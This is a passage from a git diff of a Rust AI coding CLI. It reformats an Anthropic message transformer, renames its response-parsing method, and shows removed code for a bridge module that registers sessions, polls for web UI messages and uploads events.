&ProviderRequest, - _model: &ModelInfo, - ) -> Result { - use serde_json::json; - - // Convert messages to API wire format. - let normalized_messages = normalize_anthropic_messages(&request.messages); - let api_messages: Vec = - normalized_messages.iter().map(ApiMessage::from).collect(); - let messages_json = serde_json::to_value(&api_messages).map_err(|e| { - ProviderError::Other { - provider: ProviderId::new(ProviderId::ANTHROPIC), - message: format!("failed to serialise messages: {}", e), - status: None, - body: None, - } - })?; - - // Convert tools to API wire format. - let api_tools: Vec = request - .tools - .iter() - .map(ApiToolDefinition::from) - .collect(); - - let mut body = json!({ - "model": request.model, - "messages": messages_json, - "max_tokens": request.max_tokens, - }); - - // System prompt — Anthropic uses a top-level `system` field. - if let Some(sys) = &request.system_prompt { - use crate::provider_types::SystemPrompt; - let sys_text = match sys { - SystemPrompt::Text(t) => t.clone(), - SystemPrompt::Blocks(blocks) => blocks - .iter() - .map(|b| b.text.clone()) - .collect::>() - .join("\n"), - }; - body["system"] = serde_json::Value::String(sys_text); - } - - // Tools. - if !request.tools.is_empty() { - let tools_json = serde_json::to_value(&api_tools).map_err(|e| { - ProviderError::Other { - provider: ProviderId::new(ProviderId::ANTHROPIC), - message: format!("failed to serialise tools: {}", e), - status: None, - body: None, - } - })?; - body["tools"] = tools_json; - } - - // Optional sampling parameters. - if let Some(t) = request.temperature { - body["temperature"] = serde_json::Value::from(t); - } - if let Some(p) = request.top_p { - body["top_p"] = serde_json::Value::from(p); - } - if let Some(k) = request.top_k { - body["top_k"] = serde_json::Value::from(k); - } - if !request.stop_sequences.is_empty() { - body["stop_sequences"] = - serde_json::to_value(&request.stop_sequences).unwrap_or_default(); - } - - // Extended thinking. - if let Some(tc) = &request.thinking { - body["thinking"] = serde_json::to_value(tc).unwrap_or_default(); - } - - Ok(body) - } - - fn from_provider( - &self, - response: &serde_json::Value, - ) -> Result { - let anthropic_id = ProviderId::new(ProviderId::ANTHROPIC); - - let id = response - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("unknown") - .to_string(); - - let model = response - .get("model") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - - let stop_reason = response - .get("stop_reason") - .and_then(|v| v.as_str()) - .map(map_stop_reason) - .unwrap_or(StopReason::EndTurn); - - // Parse usage. - let usage = { - let u = response.get("usage"); - UsageInfo { - input_tokens: u - .and_then(|v| v.get("input_tokens")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: u - .and_then(|v| v.get("output_tokens")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: u - .and_then(|v| v.get("cache_creation_input_tokens")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_read_input_tokens: u - .and_then(|v| v.get("cache_read_input_tokens")) - .and_then(|v| v.as_u64()) - .unwrap_or(0), - } - }; - - // Parse content blocks. - let content_arr = response - .get("content") - .and_then(|v| v.as_array()) - .ok_or_else(|| ProviderError::Other { - provider: anthropic_id.clone(), - message: "missing 'content' array in response".to_string(), - status: None, - body: None, - })?; - - let mut content: Vec = Vec::new(); - for block in content_arr { - let block_type = block.get("type").and_then(|v| v.as_str()).unwrap_or(""); - match block_type { - "text" => { - let text = block - .get("text") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - content.push(ContentBlock::Text { text }); - } - "tool_use" => { - let tool_id = block - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let name = block - .get("name") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let input = block - .get("input") - .cloned() - .unwrap_or(serde_json::Value::Object(Default::default())); - content.push(ContentBlock::ToolUse { - id: tool_id, - name, - input, - }); - } - "thinking" => { - let thinking = block - .get("thinking") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let signature = block - .get("signature") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - content.push(ContentBlock::Thinking { thinking, signature }); - } - // redacted_thinking, citations, etc. — skip silently for now. - _ => {} - } - } - - Ok(ProviderResponse { - id, - content, - stop_reason, - usage, - model, - }) - } -} - -// --------------------------------------------------------------------------- -// Helpers -// --------------------------------------------------------------------------- - -fn map_stop_reason(s: &str) -> StopReason { - match s { - "end_turn" => StopReason::EndTurn, - "stop_sequence" => StopReason::StopSequence, - "max_tokens" => StopReason::MaxTokens, - "tool_use" => StopReason::ToolUse, - other => StopReason::Other(other.to_string()), - } -} +// transformers/anthropic.rs — Identity transformer for the Anthropic wire +// format (ProviderRequest → Anthropic JSON body and back). +// +// The Anthropic provider is the native/internal format for Coven Code, so +// `to_provider` serialises the request fields directly to the Anthropic v1 +// messages schema and `from_provider` parses the standard Anthropic response. + +use crate::provider::ModelInfo; +use crate::provider_error::ProviderError; +use crate::provider_types::{ProviderRequest, ProviderResponse, StopReason}; +use crate::providers::message_normalization::normalize_anthropic_messages; +use crate::transform::MessageTransformer; +use crate::types::{ApiMessage, ApiToolDefinition}; +use claurst_core::provider_id::ProviderId; +use claurst_core::types::{ContentBlock, UsageInfo}; + +// --------------------------------------------------------------------------- +// AnthropicTransformer +// --------------------------------------------------------------------------- + +/// Identity transformer: converts `ProviderRequest` to the Anthropic v1 +/// messages JSON body, and parses the Anthropic JSON response into a +/// `ProviderResponse`. +/// +/// This mirrors the logic in `AnthropicProvider::build_request` and the +/// `create_message` accumulation code, but works purely as a JSON↔type +/// mapping without owning an HTTP client. +pub struct AnthropicTransformer; + +impl MessageTransformer for AnthropicTransformer { + fn to_provider( + &self, + request: &ProviderRequest, + _model: &ModelInfo, + ) -> Result { + use serde_json::json; + + // Convert messages to API wire format. + let normalized_messages = normalize_anthropic_messages(&request.messages); + let api_messages: Vec = + normalized_messages.iter().map(ApiMessage::from).collect(); + let messages_json = + serde_json::to_value(&api_messages).map_err(|e| ProviderError::Other { + provider: ProviderId::new(ProviderId::ANTHROPIC), + message: format!("failed to serialise messages: {}", e), + status: None, + body: None, + })?; + + // Convert tools to API wire format. + let api_tools: Vec = + request.tools.iter().map(ApiToolDefinition::from).collect(); + + let mut body = json!({ + "model": request.model, + "messages": messages_json, + "max_tokens": request.max_tokens, + }); + + // System prompt — Anthropic uses a top-level `system` field. + if let Some(sys) = &request.system_prompt { + use crate::provider_types::SystemPrompt; + let sys_text = match sys { + SystemPrompt::Text(t) => t.clone(), + SystemPrompt::Blocks(blocks) => blocks + .iter() + .map(|b| b.text.clone()) + .collect::>() + .join("\n"), + }; + body["system"] = serde_json::Value::String(sys_text); + } + + // Tools. + if !request.tools.is_empty() { + let tools_json = + serde_json::to_value(&api_tools).map_err(|e| ProviderError::Other { + provider: ProviderId::new(ProviderId::ANTHROPIC), + message: format!("failed to serialise tools: {}", e), + status: None, + body: None, + })?; + body["tools"] = tools_json; + } + + // Optional sampling parameters. + if let Some(t) = request.temperature { + body["temperature"] = serde_json::Value::from(t); + } + if let Some(p) = request.top_p { + body["top_p"] = serde_json::Value::from(p); + } + if let Some(k) = request.top_k { + body["top_k"] = serde_json::Value::from(k); + } + if !request.stop_sequences.is_empty() { + body["stop_sequences"] = + serde_json::to_value(&request.stop_sequences).unwrap_or_default(); + } + + // Extended thinking. + if let Some(tc) = &request.thinking { + body["thinking"] = serde_json::to_value(tc).unwrap_or_default(); + } + + Ok(body) + } + + fn parse_provider_response( + &self, + response: &serde_json::Value, + ) -> Result { + let anthropic_id = ProviderId::new(ProviderId::ANTHROPIC); + + let id = response + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("unknown") + .to_string(); + + let model = response + .get("model") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let stop_reason = response + .get("stop_reason") + .and_then(|v| v.as_str()) + .map(map_stop_reason) + .unwrap_or(StopReason::EndTurn); + + // Parse usage. + let usage = { + let u = response.get("usage"); + UsageInfo { + input_tokens: u + .and_then(|v| v.get("input_tokens")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + output_tokens: u + .and_then(|v| v.get("output_tokens")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_creation_input_tokens: u + .and_then(|v| v.get("cache_creation_input_tokens")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + cache_read_input_tokens: u + .and_then(|v| v.get("cache_read_input_tokens")) + .and_then(|v| v.as_u64()) + .unwrap_or(0), + } + }; + + // Parse content blocks. + let content_arr = response + .get("content") + .and_then(|v| v.as_array()) + .ok_or_else(|| ProviderError::Other { + provider: anthropic_id.clone(), + message: "missing 'content' array in response".to_string(), + status: None, + body: None, + })?; + + let mut content: Vec = Vec::new(); + for block in content_arr { + let block_type = block.get("type").and_then(|v| v.as_str()).unwrap_or(""); + match block_type { + "text" => { + let text = block + .get("text") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + content.push(ContentBlock::Text { text }); + } + "tool_use" => { + let tool_id = block + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let name = block + .get("name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let input = block + .get("input") + .cloned() + .unwrap_or(serde_json::Value::Object(Default::default())); + content.push(ContentBlock::ToolUse { + id: tool_id, + name, + input, + }); + } + "thinking" => { + let thinking = block + .get("thinking") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let signature = block + .get("signature") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + content.push(ContentBlock::Thinking { + thinking, + signature, + }); + } + // redacted_thinking, citations, etc. — skip silently for now. + _ => {} + } + } + + Ok(ProviderResponse { + id, + content, + stop_reason, + usage, + model, + }) + } +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +fn map_stop_reason(s: &str) -> StopReason { + match s { + "end_turn" => StopReason::EndTurn, + "stop_sequence" => StopReason::StopSequence, + "max_tokens" => StopReason::MaxTokens, + "tool_use" => StopReason::ToolUse, + other => StopReason::Other(other.to_string()), + } +} diff --git a/src-rust/crates/api/src/transformers/openai_chat.rs b/src-rust/crates/api/src/transformers/openai_chat.rs index 5f8171e..a052d3b 100644 --- a/src-rust/crates/api/src/transformers/openai_chat.rs +++ b/src-rust/crates/api/src/transformers/openai_chat.rs @@ -31,8 +31,10 @@ impl MessageTransformer for OpenAiChatTransformer { ) -> Result { use serde_json::json; - let messages = - OpenAiProvider::to_openai_messages_pub(&request.messages, request.system_prompt.as_ref()); + let messages = OpenAiProvider::to_openai_messages_pub( + &request.messages, + request.system_prompt.as_ref(), + ); let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); let mut body = json!({ @@ -58,7 +60,7 @@ impl MessageTransformer for OpenAiChatTransformer { Ok(body) } - fn from_provider( + fn parse_provider_response( &self, response: &serde_json::Value, ) -> Result { diff --git a/src-rust/crates/bridge/src/lib.rs b/src-rust/crates/bridge/src/lib.rs index 1fe1959..8a055c4 100644 --- a/src-rust/crates/bridge/src/lib.rs +++ b/src-rust/crates/bridge/src/lib.rs @@ -1,1713 +1,1717 @@ -// cc-bridge: Remote control bridge implementation. -// -// The bridge connects the local Coven Code CLI to the claude.ai web UI, -// enabling mobile/web-initiated sessions. This module implements: -// -// - Bridge configuration management (env-var and defaults) -// - Device fingerprinting for trusted-device identification -// - JWT decode/expiry utilities (client-side, no signature verification) -// - Session lifecycle (register, poll, upload events, deregister) -// - Message and event protocol types for bidirectional communication -// - Long-polling loop with exponential backoff and cancellation -// - Public `start_bridge` API that spawns background task and returns channels -// -// Architecture mirrors the TypeScript bridge (bridgeMain.ts / bridgeApi.ts), -// adapted to idiomatic Rust async with tokio channels and reqwest. - -#![warn(clippy::all)] - -use anyhow::Context; -use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; -use parking_lot::RwLock; -use serde::{Deserialize, Serialize}; -use sha2::{Digest, Sha256}; -use std::sync::Arc; -use tokio::sync::mpsc; -use tokio_util::sync::CancellationToken; -use tracing::{debug, error, info, warn}; - -// --------------------------------------------------------------------------- -// JWT utilities -// --------------------------------------------------------------------------- - -/// Decoded claims from a session-ingress JWT. -/// -/// Parsed client-side without signature verification — used only for -/// expiry checks and display, never for authorization decisions. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JwtClaims { - /// Subject (usually user / device identifier). - pub sub: Option, - /// Expiry Unix timestamp (seconds). - pub exp: Option, - /// Issued-at Unix timestamp (seconds). - pub iat: Option, - /// Trusted-device identifier embedded by the server. - pub device_id: Option, - /// Session identifier embedded by the server. - pub session_id: Option, -} - -impl JwtClaims { - /// Decode a JWT payload segment without verifying the signature. - /// - /// Strips the `sk-ant-si-` session-ingress prefix if present, then - /// base64url-decodes the second `.`-separated segment and JSON-parses it. - /// Returns an error if the token is malformed or the JSON is invalid. - pub fn decode(token: &str) -> anyhow::Result { - // Strip session-ingress prefix used by Anthropic's ingress tokens. - let jwt = if token.starts_with("sk-ant-si-") { - &token["sk-ant-si-".len()..] - } else { - token - }; - - let parts: Vec<&str> = jwt.split('.').collect(); - if parts.len() < 2 { - anyhow::bail!("Invalid JWT: expected at least 2 dot-separated segments"); - } - - let raw = URL_SAFE_NO_PAD - .decode(parts[1]) - .context("JWT payload is not valid base64url")?; - - serde_json::from_slice::(&raw) - .context("JWT payload is not valid JSON matching JwtClaims") - } - - /// Returns `true` if the `exp` claim is in the past. - /// - /// When `exp` is absent the token is treated as non-expired (permissive - /// default), matching the TypeScript behaviour in `jwtUtils.ts`. - pub fn is_expired(&self) -> bool { - if let Some(exp) = self.exp { - let now = chrono::Utc::now().timestamp(); - exp < now - } else { - false - } - } - - /// Remaining lifetime in seconds, or `None` if no `exp` claim or already - /// expired. - pub fn remaining_secs(&self) -> Option { - let exp = self.exp?; - let now = chrono::Utc::now().timestamp(); - let diff = exp - now; - if diff > 0 { Some(diff) } else { None } - } -} - -/// Decode just the expiry timestamp from a raw JWT string. -/// Returns `None` if the token is malformed or has no `exp` claim. -pub fn decode_jwt_expiry(token: &str) -> Option { - JwtClaims::decode(token).ok()?.exp -} - -/// Returns `true` if the token is expired (or unparseable). -pub fn jwt_is_expired(token: &str) -> bool { - JwtClaims::decode(token) - .map(|c| c.is_expired()) - .unwrap_or(true) -} - -// --------------------------------------------------------------------------- -// Device fingerprint -// --------------------------------------------------------------------------- - -/// Compute a stable device fingerprint from machine-local information. -/// -/// Combines hostname, login user name, and home directory path, then SHA-256 -/// hashes them and returns the full hex digest. Matching the TypeScript -/// `trustedDevice.ts` algorithm so fingerprints are consistent across the -/// two implementations. -pub fn device_fingerprint() -> String { - let mut input = String::with_capacity(128); - - if let Ok(host) = hostname::get() { - input.push_str(&host.to_string_lossy()); - } - input.push(':'); - - if let Ok(user) = std::env::var("USER").or_else(|_| std::env::var("USERNAME")) { - input.push_str(&user); - } - input.push(':'); - - if let Some(home) = dirs::home_dir() { - input.push_str(&home.display().to_string()); - } - - let mut hasher = Sha256::new(); - hasher.update(input.as_bytes()); - hex::encode(hasher.finalize()) -} - -// --------------------------------------------------------------------------- -// Bridge configuration -// --------------------------------------------------------------------------- - -/// Runtime configuration for the bridge subsystem. -/// -/// Built either from env vars via [`BridgeConfig::from_env`] or manually -/// by the caller. The bridge is only active when both `enabled` is `true` -/// **and** a `session_token` is present (see [`BridgeConfig::is_active`]). -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BridgeConfig { - /// Whether the bridge feature is turned on. - pub enabled: bool, - /// Base URL for bridge API calls (e.g. `https://claude.ai`). - pub server_url: String, - /// Stable device identifier (SHA-256 fingerprint or custom value). - pub device_id: String, - /// Bearer token (OAuth access token or session-ingress JWT). - pub session_token: Option, - /// How long to wait between poll cycles (milliseconds). - pub polling_interval_ms: u64, - /// Maximum successive failed polls before the loop gives up. - pub max_reconnect_attempts: u32, - /// Per-session inactivity timeout in milliseconds (default 24 h). - pub session_timeout_ms: u64, - /// Runner version string sent on API calls for server-side diagnostics. - pub runner_version: String, -} - -impl Default for BridgeConfig { - fn default() -> Self { - Self { - enabled: false, - server_url: "https://claude.ai".to_string(), - device_id: device_fingerprint(), - session_token: None, - polling_interval_ms: 1_000, - max_reconnect_attempts: 10, - session_timeout_ms: 24 * 60 * 60 * 1_000, - runner_version: env!("CARGO_PKG_VERSION").to_string(), - } - } -} - -impl BridgeConfig { - /// Build config from environment variables. - /// - /// Recognised variables: - /// - `COVEN_CODE_BRIDGE_URL` — overrides `server_url` and sets `enabled = true` - /// - `COVEN_CODE_BRIDGE_TOKEN` / `CLAUDE_BRIDGE_OAUTH_TOKEN` — sets `session_token` - /// - `CLAUDE_BRIDGE_BASE_URL` — alternative URL override (ant-only dev override) - pub fn from_env() -> Self { - let mut config = Self::default(); - - // URL override (sets enabled implicitly) - if let Ok(url) = std::env::var("COVEN_CODE_BRIDGE_URL") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) - { - if !url.is_empty() { - config.server_url = url; - config.enabled = true; - } - } - - // Token override - if let Ok(token) = std::env::var("COVEN_CODE_BRIDGE_TOKEN") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_OAUTH_TOKEN")) - { - if !token.is_empty() { - config.session_token = Some(token); - } - } - - config - } - - /// Returns `true` only when the bridge is both enabled and has a token. - pub fn is_active(&self) -> bool { - self.enabled && self.session_token.is_some() - } - - /// Validate that a server-provided ID is safe to interpolate into a URL - /// path segment. Prevents path traversal (e.g. `../../admin`). - /// - /// Mirrors `validateBridgeId()` in `bridgeApi.ts`. - pub fn validate_id<'a>(id: &'a str, label: &str) -> anyhow::Result<&'a str> { - static RE: std::sync::OnceLock = std::sync::OnceLock::new(); - let re = RE.get_or_init(|| regex::Regex::new(r"^[a-zA-Z0-9_-]+$").unwrap()); - if id.is_empty() || !re.is_match(id) { - anyhow::bail!("Invalid {}: contains unsafe characters", label); - } - Ok(id) - } -} - -// --------------------------------------------------------------------------- -// Permission decision -// --------------------------------------------------------------------------- - -/// A tool-use permission decision sent by the web UI back to the CLI. -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum PermissionDecision { - Allow, - AllowPermanently, - Deny, - DenyPermanently, -} - -// --------------------------------------------------------------------------- -// Bridge message types (web UI → CLI) -// --------------------------------------------------------------------------- - -/// A file attachment bundled with an inbound user message. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BridgeAttachment { - /// Display name (filename or label). - pub name: String, - /// Raw text or base64-encoded content. - pub content: String, - /// MIME type, e.g. `"text/plain"`. - pub mime_type: Option, -} - -/// Messages flowing from the web UI into the CLI. -#[derive(Debug, Clone, Serialize, Deserialize)] -#[serde(tag = "type", rename_all = "snake_case")] -pub enum BridgeMessage { - /// A new user prompt from the web UI. - UserMessage { - content: String, - session_id: String, - message_id: String, - #[serde(default)] - attachments: Vec, - }, - /// The web UI has responded to a permission request. - PermissionResponse { - request_id: String, - tool_use_id: Option, - decision: PermissionDecision, - }, - /// Cancel the in-progress operation for a session. - Cancel { - session_id: String, - reason: Option, - }, - /// Keepalive — the CLI should respond with a `Pong` event. - Ping, -} - -// --------------------------------------------------------------------------- -// Bridge event types (CLI → web UI) -// --------------------------------------------------------------------------- - -/// Token-budget / cost summary attached to `TurnComplete`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BridgeUsage { - pub input_tokens: u32, - pub output_tokens: u32, - pub cost_usd: Option, -} - -/// Session connection state broadcast to the web UI. -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum BridgeSessionState { - Connecting, - Connected, - Idle, - Processing, - Disconnected, - Error, -} - -/// Events flowing from the CLI up to the web UI. -#[derive(Debug, Clone, Serialize, Deserialize)] -#[serde(tag = "type", rename_all = "snake_case")] -pub enum BridgeEvent { - /// Streaming text delta for the current assistant turn. - TextDelta { - text: String, - message_id: String, - index: Option, - }, - /// A tool call has started executing. - ToolStart { - tool_name: String, - tool_id: String, - input_preview: Option, - }, - /// A tool call has finished. - ToolEnd { - tool_name: String, - tool_id: String, - result: String, - is_error: bool, - }, - /// The CLI needs the web UI to approve a tool use. - PermissionRequest { - request_id: String, - tool_use_id: String, - tool_name: String, - description: String, - options: Vec, - }, - /// The current turn has completed. - TurnComplete { - message_id: String, - stop_reason: String, - usage: Option, - }, - /// A non-fatal diagnostic or user-visible error message. - Error { - message: String, - code: Option, - }, - /// Response to a `Ping` message. - Pong { - server_time: Option, - }, - /// Session lifecycle state change. - SessionState { - session_id: String, - state: BridgeSessionState, - }, -} - -// --------------------------------------------------------------------------- -// Bridge session state (internal) -// --------------------------------------------------------------------------- - -/// Internal connection state of a [`BridgeSession`]. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum BridgeState { - Disconnected, - Connecting, - Connected, - Running, - Error(String), -} - -// --------------------------------------------------------------------------- -// Bridge session -// --------------------------------------------------------------------------- - -/// Active bridge session: owns the HTTP client, session credentials, and -/// state. Runs the poll loop in a background tokio task. -pub struct BridgeSession { - config: BridgeConfig, - session_id: String, - state: Arc>, - http: reqwest::Client, - reconnect_count: u32, - #[allow(dead_code)] - last_ping: Option, -} - -impl BridgeSession { - /// Create a new bridge session; generates a fresh UUID for `session_id`. - pub fn new(config: BridgeConfig) -> Self { - let session_id = uuid::Uuid::new_v4().to_string(); - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(30)) - .user_agent(format!( - "claude-code-rust/{}", - env!("CARGO_PKG_VERSION") - )) - .build() - .expect("Failed to build reqwest client"); - - Self { - config, - session_id, - state: Arc::new(RwLock::new(BridgeState::Connecting)), - http, - reconnect_count: 0, - last_ping: None, - } - } - - pub fn session_id(&self) -> &str { - &self.session_id - } - - pub fn current_state(&self) -> BridgeState { - self.state.read().clone() - } - - fn set_state(&self, s: BridgeState) { - *self.state.write() = s; - } - - // ----------------------------------------------------------------------- - // Session registration / deregistration - // ----------------------------------------------------------------------- - - /// Register this bridge session with the CCR server. - /// - /// POST `/api/claude_code/sessions` — mirrors the TypeScript - /// `registerBridgeEnvironment` call in `bridgeApi.ts`. - pub async fn register(&mut self) -> anyhow::Result<()> { - let token = self - .config - .session_token - .as_deref() - .ok_or_else(|| anyhow::anyhow!("Bridge register: no session token"))?; - - let url = format!( - "{}/api/claude_code/sessions", - self.config.server_url - ); - - let body = serde_json::json!({ - "session_id": self.session_id, - "device_id": self.config.device_id, - "client_version": self.config.runner_version, - }); - - debug!(session_id = %self.session_id, url = %url, "Registering bridge session"); - - let resp = self - .http - .post(&url) - .bearer_auth(token) - .header("anthropic-version", "2023-06-01") - .header("x-environment-runner-version", &self.config.runner_version) - .json(&body) - .send() - .await - .context("Bridge register: HTTP send failed")?; - - let status = resp.status().as_u16(); - match status { - 200 | 201 => { - self.set_state(BridgeState::Connected); - info!(session_id = %self.session_id, "Bridge session registered"); - Ok(()) - } - 401 | 403 => { - self.set_state(BridgeState::Error(format!("Auth error: {status}"))); - anyhow::bail!("Bridge register: auth error ({})", status) - } - _ => { - anyhow::bail!("Bridge register: server returned {}", status) - } - } - } - - /// Deregister the session on clean shutdown. - /// - /// DELETE `/api/claude_code/sessions/{id}` — best-effort; errors are - /// logged and swallowed so they don't block process exit. - pub async fn deregister(&self) { - let Some(token) = self.config.session_token.as_deref() else { - return; - }; - - let url = format!( - "{}/api/claude_code/sessions/{}", - self.config.server_url, self.session_id - ); - - debug!(session_id = %self.session_id, "Deregistering bridge session"); - - match self - .http - .delete(&url) - .bearer_auth(token) - .send() - .await - { - Ok(r) if r.status().is_success() => { - info!(session_id = %self.session_id, "Bridge session deregistered"); - } - Ok(r) => { - warn!( - session_id = %self.session_id, - status = %r.status(), - "Bridge deregister returned non-success (ignored)" - ); - } - Err(e) => { - warn!( - session_id = %self.session_id, - error = %e, - "Bridge deregister HTTP error (ignored)" - ); - } - } - } - - // ----------------------------------------------------------------------- - // Polling - // ----------------------------------------------------------------------- - - /// Long-poll for incoming messages from the web UI. - /// - /// GET `/api/claude_code/sessions/{id}/poll` - /// - /// - `200` → JSON array of [`BridgeMessage`]; may be empty. - /// - `204` → No messages; returns empty vec. - /// - `401`/`403` → Auth failure; sets state to `Disconnected` and errors. - async fn poll_messages(&self) -> anyhow::Result> { - let token = self - .config - .session_token - .as_deref() - .ok_or_else(|| anyhow::anyhow!("Poll: no token"))?; - - let url = format!( - "{}/api/claude_code/sessions/{}/poll", - self.config.server_url, self.session_id - ); - - let resp = self - .http - .get(&url) - .bearer_auth(token) - .timeout(std::time::Duration::from_secs(35)) - .send() - .await - .context("Bridge poll: HTTP send failed")?; - - let status = resp.status().as_u16(); - match status { - 200 => { - let text = resp.text().await.context("Bridge poll: reading body")?; - if text.trim().is_empty() || text.trim() == "[]" { - return Ok(vec![]); - } - let msgs: Vec = - serde_json::from_str(&text).context("Bridge poll: JSON parse")?; - Ok(msgs) - } - 204 => Ok(vec![]), - 401 | 403 => { - self.set_state(BridgeState::Error(format!("Auth error: {status}"))); - anyhow::bail!("Bridge poll: auth error ({})", status) - } - _ => { - anyhow::bail!("Bridge poll: server returned {}", status) - } - } - } - - // ----------------------------------------------------------------------- - // Event upload - // ----------------------------------------------------------------------- - - /// Batch-upload outgoing events to the web UI. - /// - /// POST `/api/claude_code/sessions/{id}/events` - async fn upload_events(&self, events: Vec) -> anyhow::Result<()> { - if events.is_empty() { - return Ok(()); - } - - let token = self - .config - .session_token - .as_deref() - .ok_or_else(|| anyhow::anyhow!("Upload: no token"))?; - - let url = format!( - "{}/api/claude_code/sessions/{}/events", - self.config.server_url, self.session_id - ); - - let body = serde_json::json!({ "events": events }); - - let resp = self - .http - .post(&url) - .bearer_auth(token) - .json(&body) - .send() - .await - .context("Bridge upload: HTTP send failed")?; - - if !resp.status().is_success() { - let status = resp.status().as_u16(); - warn!( - session_id = %self.session_id, - status, - count = events.len(), - "Bridge event upload failed" - ); - anyhow::bail!("Bridge upload: server returned {}", status); - } - - debug!( - session_id = %self.session_id, - count = events.len(), - "Bridge events uploaded" - ); - Ok(()) - } - - // ----------------------------------------------------------------------- - // Main poll loop - // ----------------------------------------------------------------------- - - /// Run the bridge poll loop until `cancel` is triggered or a fatal error - /// occurs. - /// - /// On each iteration: - /// 1. Drain any pending outgoing events and upload them in a batch. - /// 2. Long-poll for incoming messages and forward them to `msg_tx`. - /// 3. Back off exponentially on consecutive errors; give up after - /// `config.max_reconnect_attempts`. - /// 4. Sleep `polling_interval_ms` between successful cycles. - pub async fn run_poll_loop( - mut self, - msg_tx: mpsc::Sender, - mut event_rx: mpsc::Receiver, - cancel: CancellationToken, - ) { - info!(session_id = %self.session_id, "Bridge poll loop started"); - - let base_interval = std::time::Duration::from_millis( - self.config.polling_interval_ms.max(500), - ); - let max_backoff = std::time::Duration::from_secs(60); - - loop { - // Respect cancellation at the top of every iteration. - if cancel.is_cancelled() { - info!(session_id = %self.session_id, "Bridge poll loop cancelled"); - break; - } - - // --- Drain and upload pending events --- - let mut events: Vec = Vec::new(); - while let Ok(ev) = event_rx.try_recv() { - events.push(ev); - } - if !events.is_empty() { - if let Err(e) = self.upload_events(events).await { - warn!(session_id = %self.session_id, error = %e, "Event upload error"); - } - } - - // --- Poll for incoming messages --- - match self.poll_messages().await { - Ok(messages) => { - // Successful poll — reset reconnect counter. - self.reconnect_count = 0; - - for msg in messages { - if msg_tx.send(msg).await.is_err() { - debug!( - session_id = %self.session_id, - "Incoming message channel closed; stopping poll loop" - ); - return; - } - } - } - Err(e) => { - warn!( - session_id = %self.session_id, - error = %e, - reconnect_count = self.reconnect_count, - "Bridge poll error" - ); - - self.reconnect_count += 1; - - if self.config.max_reconnect_attempts > 0 - && self.reconnect_count >= self.config.max_reconnect_attempts - { - error!( - session_id = %self.session_id, - "Max bridge reconnect attempts ({}) reached; stopping", - self.config.max_reconnect_attempts - ); - self.set_state(BridgeState::Error("max reconnects exceeded".into())); - break; - } - - // Exponential backoff capped at `max_backoff`. - let backoff = (base_interval - * 2u32.pow(self.reconnect_count.saturating_sub(1).min(5))) - .min(max_backoff); - - tokio::select! { - _ = tokio::time::sleep(backoff) => {} - _ = cancel.cancelled() => { - info!( - session_id = %self.session_id, - "Bridge cancelled during backoff sleep" - ); - break; - } - } - continue; - } - } - - // --- Wait for the next poll cycle --- - tokio::select! { - _ = tokio::time::sleep(base_interval) => {} - _ = cancel.cancelled() => { - info!( - session_id = %self.session_id, - "Bridge cancelled during idle sleep" - ); - break; - } - } - } - - // Best-effort deregister on shutdown. - self.deregister().await; - info!(session_id = %self.session_id, "Bridge poll loop terminated"); - } -} - -// --------------------------------------------------------------------------- -// Bridge manager -// --------------------------------------------------------------------------- - -/// High-level manager wrapping configuration and a shared HTTP client. -/// -/// Prefer [`start_bridge`] for the simple one-shot API. -pub struct BridgeManager { - config: BridgeConfig, - http: reqwest::Client, -} - -impl BridgeManager { - pub fn new(config: BridgeConfig) -> anyhow::Result { - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(30)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("BridgeManager: failed to build HTTP client")?; - Ok(Self { config, http }) - } - - /// Start the bridge polling loop, returning channel endpoints and the - /// session ID. - /// - /// The background task runs until `cancel` is triggered. - pub async fn start( - &self, - cancel: CancellationToken, - ) -> anyhow::Result<( - mpsc::Receiver, - mpsc::Sender, - String, - )> { - start_bridge_with_client(self.config.clone(), self.http.clone(), cancel).await - } -} - -// --------------------------------------------------------------------------- -// Public API -// --------------------------------------------------------------------------- - -/// Start the bridge subsystem in a background task. -/// -/// Registers a new session with the CCR server, then spawns a tokio task -/// running the poll loop. Returns: -/// - `msg_rx` — incoming messages from the web UI (e.g. user prompts). -/// - `event_tx` — sender for outgoing events (e.g. text deltas, tool calls). -/// - `session_id` — the UUID assigned to this session. -/// -/// The background task runs until `cancel` is triggered or too many -/// consecutive errors occur. On shutdown the 